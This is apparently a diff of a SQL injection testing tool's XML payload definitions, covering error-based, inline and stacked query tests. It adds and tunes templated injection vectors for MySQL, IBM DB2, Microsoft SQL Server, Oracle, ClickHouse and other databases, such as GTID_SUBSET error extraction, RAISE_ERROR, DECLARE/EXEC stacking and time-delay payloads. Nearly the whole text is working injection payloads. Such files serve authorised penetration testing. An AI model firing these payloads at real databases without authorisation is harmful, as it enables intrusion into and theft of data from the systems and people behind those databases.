+        <stype>2</stype>
+        <level>5</level>
+        <risk>1</risk>
+        <clause>1,2,3,9</clause>
+        <where>3</where>
+        <vector>GTID_SUBSET(CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'),[RANDNUM])</vector>
+        <request>
+            <payload>GTID_SUBSET(CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]'),[RANDNUM])</payload>
+        </request>
+        <response>
+            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+            <dbms_version>&gt;= 5.6</dbms_version>
+        </details>
+    </test>
+
     <test>
         <title>MySQL &gt;= 5.7.8 error-based - Parameter replace (JSON_KEYS)</title>
         <stype>2</stype>
@@ -800,17 +1027,17 @@
     <test>
         <title>MySQL &gt;= 5.0 error-based - Parameter replace (FLOOR)</title>
         <stype>2</stype>
-        <level>1</level>
+        <level>2</level>
         <risk>1</risk>
         <clause>1,2,3,9</clause>
         <where>3</where>
-        <vector>(SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)</vector>
+        <vector>(SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)</vector>
         <request>
             <!-- These work as good as ELT(), but are longer
-            <payload>(SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)</payload>
+            <payload>(SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)</payload>
-            <payload>(SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (MAKE_SET([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)</payload>
+            <payload>(SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (MAKE_SET([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)</payload>
             -->
-            <payload>(SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)</payload>
+            <payload>(SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)</payload>
         </request>
         <response>
             <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
@@ -848,7 +1075,7 @@
     <test>
         <title>MySQL &gt;= 5.1 error-based - Parameter replace (EXTRACTVALUE)</title>
         <stype>2</stype>
-        <level>3</level>
+        <level>2</level>
         <risk>1</risk>
         <clause>1,2,3,9</clause>
         <where>3</where>
@@ -924,7 +1151,6 @@
         <details>
             <dbms>Microsoft SQL Server</dbms>
             <dbms>Sybase</dbms>
-            <os>Windows</os>
         </details>
     </test>
 
@@ -945,7 +1171,6 @@
         <details>
             <dbms>Microsoft SQL Server</dbms>
             <dbms>Sybase</dbms>
-            <os>Windows</os>
         </details>
     </test>
 
@@ -986,6 +1211,25 @@
             <dbms>Firebird</dbms>
         </details>
     </test>
+
+    <test>
+        <title>IBM DB2 error-based - Parameter replace</title>
+        <stype>2</stype>
+        <level>4</level>
+        <risk>1</risk>
+        <clause>1,3</clause>
+        <where>3</where>
+        <vector>RAISE_ERROR('70001','[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')</vector>
+        <request>
+            <payload>RAISE_ERROR('70001','[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM SYSIBM.SYSDUMMY1)||'[DELIMITER_STOP]')</payload>
+        </request>
+        <response>
+            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
+        </response>
+        <details>
+            <dbms>IBM DB2</dbms>
+        </details>
+    </test>
     <!-- End of error-based tests - Parameter replace -->
 
     <!-- Error-based tests - ORDER BY, GROUP BY clause -->
@@ -1029,6 +1273,26 @@
         </details>
     </test>
 
+    <test>
+        <title>MySQL &gt;= 5.6 error-based - ORDER BY, GROUP BY clause (GTID_SUBSET)</title>
+        <stype>2</stype>
+        <level>5</level>
+        <risk>1</risk>
+        <clause>2,3</clause>
+        <where>1</where>
+        <vector>,GTID_SUBSET(CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'),[RANDNUM])</vector>
+        <request>
+            <payload>,GTID_SUBSET(CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]'),[RANDNUM])</payload>
+        </request>
+        <response>
+            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+            <dbms_version>&gt;= 5.6</dbms_version>
+        </details>
+    </test>
+
     <test>
         <title>MySQL &gt;= 5.7.8 error-based - ORDER BY, GROUP BY clause (JSON_KEYS)</title>
         <stype>2</stype>
@@ -1052,13 +1316,13 @@
     <test>
         <title>MySQL &gt;= 5.0 error-based - ORDER BY, GROUP BY clause (FLOOR)</title>
         <stype>2</stype>
-        <level>3</level>
+        <level>4</level>
         <risk>1</risk>
         <clause>2,3</clause>
         <where>1</where>
-        <vector>,(SELECT 1 FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)</vector>
+        <vector>,(SELECT 1 FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)</vector>
         <request>
-            <payload>,(SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)</payload>
+            <payload>,(SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)</payload>
         </request>
         <response>
             <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
@@ -1072,7 +1336,7 @@
     <test>
         <title>MySQL &gt;= 5.1 error-based - ORDER BY, GROUP BY clause (EXTRACTVALUE)</title>
         <stype>2</stype>
-        <level>4</level>
+        <level>3</level>
         <risk>1</risk>
         <clause>2,3</clause>
         <where>1</where>
@@ -1112,7 +1376,7 @@
     <test>
         <title>MySQL &gt;= 4.1 error-based - ORDER BY, GROUP BY clause (FLOOR)</title>
         <stype>2</stype>
-        <level>2</level>
+        <level>3</level>
         <risk>1</risk>
         <clause>2,3</clause>
         <where>1</where>
@@ -1129,7 +1393,6 @@
         </details>
     </test>
 
-
     <test>
         <title>PostgreSQL error-based - ORDER BY, GROUP BY clause</title>
         <stype>2</stype>
@@ -1185,7 +1448,6 @@
         <details>
             <dbms>Microsoft SQL Server</dbms>
             <dbms>Sybase</dbms>
-            <os>Windows</os>
         </details>
     </test>
 
@@ -1213,7 +1475,7 @@
         <stype>2</stype>
         <level>5</level>
         <risk>1</risk>
-        <clause>2,3</clause>
+        <clause>3</clause>
         <where>1</where>
         <vector>,(SELECT [RANDNUM]=('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]'))</vector>
         <request>
@@ -1226,9 +1488,51 @@
             <dbms>Firebird</dbms>
         </details>
     </test>
+
+    <test>
+        <title>IBM DB2 error-based - ORDER BY clause</title>
+        <stype>2</stype>
+        <level>5</level>
+        <risk>1</risk>
+        <clause>3</clause>
+        <where>1</where>
+        <vector>,RAISE_ERROR('70001','[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')</vector>
+        <request>
+            <payload>,RAISE_ERROR('70001','[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM SYSIBM.SYSDUMMY1)||'[DELIMITER_STOP]')</payload>
+        </request>
+        <response>
+            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
+        </response>
+        <details>
+            <dbms>IBM DB2</dbms>
+        </details>
+    </test>
     <!--
          TODO: if possible, add payload for SQLite, Microsoft Access
          and SAP MaxDB - no known techniques at this time
     -->
     <!-- End of error-based tests - ORDER BY, GROUP BY clause -->
+
+    <!-- Error-based tests - stacking -->
+    <test>
+        <title>Microsoft SQL Server/Sybase error-based - Stacking (EXEC)</title>
+        <stype>2</stype>
+        <level>2</level>
+        <risk>1</risk>
+        <clause>1-8</clause>
+        <where>1</where>
+        <vector>;DECLARE @[RANDSTR] NVARCHAR(4000);SET @[RANDSTR]=(SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]');EXEC @[RANDSTR]</vector>
+        <request>
+            <payload>;DECLARE @[RANDSTR] NVARCHAR(4000);SET @[RANDSTR]=(SELECT '[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]');EXEC @[RANDSTR]</payload>
+            <comment>--</comment>
+        </request>
+        <response>
+            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
+        </response>
+        <details>
+            <dbms>Microsoft SQL Server</dbms>
+            <dbms>Sybase</dbms>
+        </details>
+    </test>
+    <!-- End of error-based tests - stacking -->
 </root>

data/xml/payloads/inline_query.xml

@@ -3,19 +3,31 @@
 <root>
     <!-- Inline queries tests -->
     <test>
-        <title>MySQL inline queries</title>
+        <title>Generic inline queries</title>
         <stype>3</stype>
         <level>1</level>
         <risk>1</risk>
         <clause>1,2,3,8</clause>
         <where>3</where>
+        <vector>(SELECT CONCAT(CONCAT('[DELIMITER_START]',([QUERY])),'[DELIMITER_STOP]'))</vector>
+        <request>
+            <payload>(SELECT CONCAT(CONCAT('[DELIMITER_START]',(CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END)),'[DELIMITER_STOP]'))</payload>
+        </request>
+        <response>
+            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
+        </response>
+    </test>
+
+    <test>
+        <title>MySQL inline queries</title>
+        <stype>3</stype>
+        <level>2</level>
+        <risk>1</risk>
+        <clause>1,2,3,8</clause>
+        <where>3</where>
         <vector>(SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'))</vector>
         <request>
-            <!-- These work as good as ELT(), but are longer
+            <payload>(SELECT CONCAT('[DELIMITER_START]',(ELT([RANDNUM]=[RANDNUM],1)),'[DELIMITER_STOP]'))</payload>
-            <payload>(SELECT CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]'))</payload>
-            <payload>(SELECT CONCAT('[DELIMITER_START]',(SELECT (MAKE_SET([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]'))</payload>
-            -->
-            <payload>(SELECT CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]'))</payload>
         </request>
         <response>
             <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
@@ -28,7 +40,7 @@
     <test>
         <title>PostgreSQL inline queries</title>
         <stype>3</stype>
-        <level>1</level>
+        <level>2</level>
         <risk>1</risk>
         <clause>1,2,3,8</clause>
         <where>3</where>
@@ -47,13 +59,13 @@
     <test>
         <title>Microsoft SQL Server/Sybase inline queries</title>
         <stype>3</stype>
-        <level>1</level>
+        <level>2</level>
         <risk>1</risk>
         <clause>1,2,3,8</clause>
         <where>3</where>
         <vector>(SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]')</vector>
         <request>
-            <payload>(SELECT '[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]')</payload>
+            <payload>(SELECT '[DELIMITER_START]'+(CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END)+'[DELIMITER_STOP]')</payload>
         </request>
         <response>
             <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
@@ -61,7 +73,6 @@
         <details>
             <dbms>Microsoft SQL Server</dbms>
             <dbms>Sybase</dbms>
-            <os>Windows</os>
         </details>
     </test>
 
@@ -74,7 +85,8 @@
         <where>3</where>
         <vector>(SELECT ('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]') FROM DUAL)</vector>
         <request>
-            <payload>(SELECT '[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]' FROM DUAL)</payload>
+            <!-- NOTE: Vertica works too without the TO_NUMBER() -->
+            <payload>(SELECT '[DELIMITER_START]'||(CASE WHEN ([RANDNUM]=[RANDNUM]) THEN TO_NUMBER(1) ELSE TO_NUMBER(0) END)||'[DELIMITER_STOP]' FROM DUAL)</payload>
         </request>
         <response>
             <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
@@ -93,7 +105,7 @@
         <where>3</where>
         <vector>SELECT '[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]'</vector>
         <request>
-            <payload>SELECT '[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))||'[DELIMITER_STOP]'</payload>
+            <payload>SELECT '[DELIMITER_START]'||(CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)||'[DELIMITER_STOP]'</payload>
         </request>
         <response>
             <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
@@ -121,5 +133,25 @@
             <dbms>Firebird</dbms>
         </details>
     </test>
+
+    <test>
+        <title>ClickHouse inline queries</title>
+        <stype>3</stype>
+        <level>3</level>
+        <risk>1</risk>
+        <clause>1,2,3,8</clause>
+        <where>3</where>
+        <vector>('[DELIMITER_START]'||CAST(([QUERY]) AS String)||'[DELIMITER_STOP]')</vector>
+        <request>
+            <payload>('[DELIMITER_START]'||(CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END)||'[DELIMITER_STOP]')</payload>
+        </request>
+        <response>
+            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
+        </response>
+        <details>
+            <dbms>ClickHouse</dbms>
+        </details>
+    </test>
+    
     <!-- End of inline queries tests -->
 </root>

data/xml/payloads/stacked_queries.xml

@@ -3,11 +3,11 @@
 <root>
     <!-- Stacked queries tests -->
     <test>
-        <title>MySQL &gt; 5.0.11 stacked queries (comment)</title>
+        <title>MySQL &gt;= 5.0.12 stacked queries (comment)</title>
         <stype>4</stype>
-        <level>1</level>
+        <level>2</level>
         <risk>1</risk>
-        <clause>0</clause>
+        <clause>1-8</clause>
         <where>1</where>
         <vector>;SELECT IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])</vector>
         <request>
@@ -19,16 +19,16 @@
         </response>
         <details>
             <dbms>MySQL</dbms>
-            <dbms_version>&gt; 5.0.11</dbms_version>
+            <dbms_version>&gt;= 5.0.12</dbms_version>
         </details>
     </test>
 
     <test>
-        <title>MySQL &gt; 5.0.11 stacked queries</title>
+        <title>MySQL &gt;= 5.0.12 stacked queries</title>
         <stype>4</stype>
-        <level>2</level>
+        <level>3</level>
         <risk>1</risk>
-        <clause>0</clause>
+        <clause>1-8</clause>
         <where>1</where>
         <vector>;SELECT IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])</vector>
         <request>
@@ -39,16 +39,16 @@
         </response>
         <details>
             <dbms>MySQL</dbms>
-            <dbms_version>&gt; 5.0.11</dbms_version>
+            <dbms_version>&gt;= 5.0.12</dbms_version>
         </details>
     </test>
 
      <test>
-        <title>MySQL &gt; 5.0.11 stacked queries (query SLEEP - comment)</title>
+        <title>MySQL &gt;= 5.0.12 stacked queries (query SLEEP - comment)</title>
         <stype>4</stype>
-        <level>2</level>
+        <level>3</level>
         <risk>1</risk>
-        <clause>0</clause>
+        <clause>1-8</clause>
         <where>1</where>
         <vector>;(SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
         <request>
@@ -60,16 +60,16 @@
         </response>
         <details>
             <dbms>MySQL</dbms>
-            <dbms_version>&gt; 5.0.11</dbms_version>
+            <dbms_version>&gt;= 5.0.12</dbms_version>
         </details>
     </test>
 
     <test>
-        <title>MySQL &gt; 5.0.11 stacked queries (query SLEEP)</title>
+        <title>MySQL &gt;= 5.0.12 stacked queries (query SLEEP)</title>
         <stype>4</stype>
-        <level>3</level>
+        <level>4</level>
         <risk>1</risk>
-        <clause>0</clause>
+        <clause>1-8</clause>
         <where>1</where>
         <vector>;(SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
         <request>
@@ -80,16 +80,16 @@
         </response>
         <details>
             <dbms>MySQL</dbms>
-            <dbms_version>&gt; 5.0.11</dbms_version>
+            <dbms_version>&gt;= 5.0.12</dbms_version>
         </details>
     </test>
 
     <test>
-        <title>MySQL &lt; 5.0.12 stacked queries (heavy query - comment)</title>
+        <title>MySQL &lt; 5.0.12 stacked queries (BENCHMARK - comment)</title>
         <stype>4</stype>
-        <level>2</level>
+        <level>3</level>
         <risk>2</risk>
-        <clause>0</clause>
+        <clause>1-8</clause>
         <where>1</where>
         <vector>;SELECT IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM])</vector>
         <request>
@@ -105,11 +105,11 @@
     </test>
 
     <test>
-        <title>MySQL &lt; 5.0.12 stacked queries (heavy query)</title>
+        <title>MySQL &lt; 5.0.12 stacked queries (BENCHMARK)</title>
         <stype>4</stype>
-        <level>4</level>
+        <level>5</level>
         <risk>2</risk>
-        <clause>0</clause>
+        <clause>1-8</clause>
         <where>1</where>
         <vector>;SELECT IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM])</vector>
         <request>
@@ -128,7 +128,7 @@
         <stype>4</stype>
         <level>1</level>
         <risk>1</risk>
-        <clause>0</clause>
+        <clause>1-8</clause>
         <where>1</where>
         <vector>;SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END)</vector>
         <request>
@@ -149,7 +149,7 @@
         <stype>4</stype>
         <level>4</level>
         <risk>1</risk>
-        <clause>0</clause>
+        <clause>1-8</clause>
         <where>1</where>
         <vector>;SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END)</vector>
         <request>
@@ -169,7 +169,7 @@
         <stype>4</stype>
         <level>2</level>
         <risk>2</risk>
-        <clause>0</clause>
+        <clause>1-8</clause>
         <where>1</where>
         <vector>;SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE [RANDNUM] END)</vector>
         <request>
@@ -189,7 +189,7 @@
         <stype>4</stype>
         <level>5</level>
         <risk>2</risk>
-        <clause>0</clause>
+        <clause>1-8</clause>
         <where>1</where>
         <vector>;SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE [RANDNUM] END)</vector>
         <request>
@@ -208,7 +208,7 @@
         <stype>4</stype>
         <level>3</level>
         <risk>1</risk>
-        <clause>0</clause>
+        <clause>1-8</clause>
         <where>1</where>
         <vector>;SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM SLEEP([SLEEPTIME])) ELSE [RANDNUM] END)</vector>
         <request>
@@ -230,7 +230,7 @@
         <stype>4</stype>
         <level>5</level>
         <risk>1</risk>
-        <clause>0</clause>
+        <clause>1-8</clause>
         <where>1</where>
         <vector>;SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM SLEEP([SLEEPTIME])) ELSE [RANDNUM] END)</vector>
         <request>
@@ -251,7 +251,7 @@
         <stype>4</stype>
         <level>1</level>
         <risk>1</risk>
-        <clause>0</clause>
+        <clause>1-8</clause>
         <where>1</where>
         <vector>;IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'</vector>
         <request>
@@ -264,7 +264,27 @@
         <details>
             <dbms>Microsoft SQL Server</dbms>
             <dbms>Sybase</dbms>
-            <os>Windows</os>
+        </details>
+    </test>
+
+    <test>
+        <title>Microsoft SQL Server/Sybase stacked queries (DECLARE - comment)</title>
+        <stype>4</stype>
+        <level>2</level>
+        <risk>1</risk>
+        <clause>1-8</clause>
+        <where>1</where>
+        <vector>;DECLARE @x CHAR(9);SET @x=0x303a303a3[SLEEPTIME];IF([INFERENCE]) WAITFOR DELAY @x</vector>
+        <request>
+            <payload>;DECLARE @x CHAR(9);SET @x=0x303a303a3[SLEEPTIME];WAITFOR DELAY @x</payload>
+            <comment>--</comment>
+        </request>
+        <response>
+            <time>[SLEEPTIME]</time>
+        </response>
+        <details>
+            <dbms>Microsoft SQL Server</dbms>
+            <dbms>Sybase</dbms>
         </details>
     </test>
 
@@ -273,7 +293,7 @@
         <stype>4</stype>
         <level>4</level>
         <risk>1</risk>
-        <clause>0</clause>
+        <clause>1-8</clause>
         <where>1</where>
         <vector>;IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'</vector>
         <request>
@@ -285,7 +305,26 @@
         <details>
             <dbms>Microsoft SQL Server</dbms>
             <dbms>Sybase</dbms>
-            <os>Windows</os>
+        </details>
+    </test>
+
+    <test>
+        <title>Microsoft SQL Server/Sybase stacked queries (DECLARE)</title>
+        <stype>4</stype>
+        <level>5</level>
+        <risk>1</risk>
+        <clause>1-8</clause>
+        <where>1</where>
+        <vector>;DECLARE @x CHAR(9);SET @x=0x303a303a3[SLEEPTIME];IF([INFERENCE]) WAITFOR DELAY @x</vector>
+        <request>
+            <payload>;DECLARE @x CHAR(9);SET @x=0x303a303a3[SLEEPTIME];WAITFOR DELAY @x</payload>
+        </request>
+        <response>
+            <time>[SLEEPTIME]</time>
+        </response>
+        <details>
+            <dbms>Microsoft SQL Server</dbms>
+            <dbms>Sybase</dbms>
         </details>
     </test>
 
@@ -294,7 +333,7 @@
         <stype>4</stype>
         <level>1</level>
         <risk>1</risk>
-        <clause>0</clause>
+        <clause>1-8</clause>
         <where>1</where>
         <vector>;SELECT CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END FROM DUAL</vector>
         <request>
@@ -314,7 +353,7 @@
         <stype>4</stype>
         <level>4</level>
         <risk>1</risk>
-        <clause>0</clause>
+        <clause>1-8</clause>
         <where>1</where>
         <vector>;SELECT CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END FROM DUAL</vector>
         <request>
@@ -333,7 +372,7 @@
         <stype>4</stype>
         <level>2</level>
         <risk>2</risk>
-        <clause>0</clause>
+        <clause>1-8</clause>
         <where>1</where>
         <vector>;SELECT CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END FROM DUAL</vector>
         <request>
@@ -353,7 +392,7 @@
         <stype>4</stype>
         <level>5</level>
         <risk>2</risk>
-        <clause>0</clause>
+        <clause>1-8</clause>
         <where>1</where>
         <vector>;SELECT CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END FROM DUAL</vector>
         <request>
@@ -372,7 +411,7 @@
         <stype>4</stype>
         <level>4</level>
         <risk>1</risk>
-        <clause>0</clause>
+        <clause>1-8</clause>
         <where>1</where>
         <vector>;BEGIN IF ([INFERENCE]) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE DBMS_LOCK.SLEEP(0); END IF; END</vector>
         <request>
@@ -392,7 +431,7 @@
         <stype>4</stype>
         <level>5</level>
         <risk>1</risk>
-        <clause>0</clause>
+        <clause>1-8</clause>
         <where>1</where>
         <vector>;BEGIN IF ([INFERENCE]) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE DBMS_LOCK.SLEEP(0); END IF; END</vector>
         <request>
@@ -411,7 +450,7 @@
         <stype>4</stype>
         <level>5</level>
         <risk>1</risk>
-        <clause>0</clause>
+        <clause>1-8</clause>
         <where>1</where>
         <vector>;BEGIN IF ([INFERENCE]) THEN USER_LOCK.SLEEP([SLEEPTIME]); ELSE USER_LOCK.SLEEP(0); END IF; END</vector>
         <request>
@@ -431,7 +470,7 @@
         <stype>4</stype>
         <level>5</level>
         <risk>1</risk>
-        <clause>0</clause>
+        <clause>1-8</clause>
         <where>1</where>
         <vector>;BEGIN IF ([INFERENCE]) THEN USER_LOCK.SLEEP([SLEEPTIME]); ELSE USER_LOCK.SLEEP(0); END IF; END</vector>
         <request>
@@ -447,10 +486,10 @@
 
     <test>
         <title>IBM DB2 stacked queries (heavy query - comment)</title>
-        <stype>5</stype>
+        <stype>4</stype>
         <level>3</level>
         <risk>2</risk>
-        <clause>1,2,3,9</clause>
+        <clause>1-8</clause>
         <where>1</where>
         <vector>;SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3 WHERE ([INFERENCE])</vector>
         <request>
@@ -467,10 +506,10 @@
 
     <test>
         <title>IBM DB2 stacked queries (heavy query)</title>
-        <stype>5</stype>
+        <stype>4</stype>
         <level>5</level>
         <risk>2</risk>
-        <clause>1,2,3,9</clause>
+        <clause>1-8</clause>
         <where>1</where>
         <vector>;SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3 WHERE ([INFERENCE])</vector>
         <request>
@@ -489,7 +528,7 @@
         <stype>4</stype>
         <level>3</level>
         <risk>2</risk>
-        <clause>0</clause>
+        <clause>1-8</clause>
         <where>1</where>
         <vector>;SELECT (CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))) ELSE [RANDNUM] END)</vector>
         <request>
@@ -510,7 +549,7 @@
         <stype>4</stype>
         <level>5</level>
         <risk>2</risk>
-        <clause>0</clause>
+        <clause>1-8</clause>
         <where>1</where>
         <vector>;SELECT (CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))) ELSE [RANDNUM] END)</vector>
         <request>
@@ -530,7 +569,7 @@
         <stype>4</stype>
         <level>4</level>
         <risk>2</risk>
-        <clause>0</clause>
+        <clause>1-8</clause>
         <where>1</where>
         <vector>;SELECT IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4),[RANDNUM]) FROM RDB$DATABASE</vector>
         <request>
@@ -551,7 +590,7 @@
         <stype>4</stype>
         <level>5</level>
         <risk>2</risk>
-        <clause>0</clause>
+        <clause>1-8</clause>
         <where>1</where>
         <vector>;SELECT IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4),[RANDNUM]) FROM RDB$DATABASE</vector>
         <request>
@@ -568,10 +607,10 @@
 
     <test>
         <title>SAP MaxDB stacked queries (heavy query - comment)</title>
-        <stype>5</stype>
+        <stype>4</stype>
         <level>4</level>
         <risk>2</risk>
-        <clause>1,2,3,9</clause>
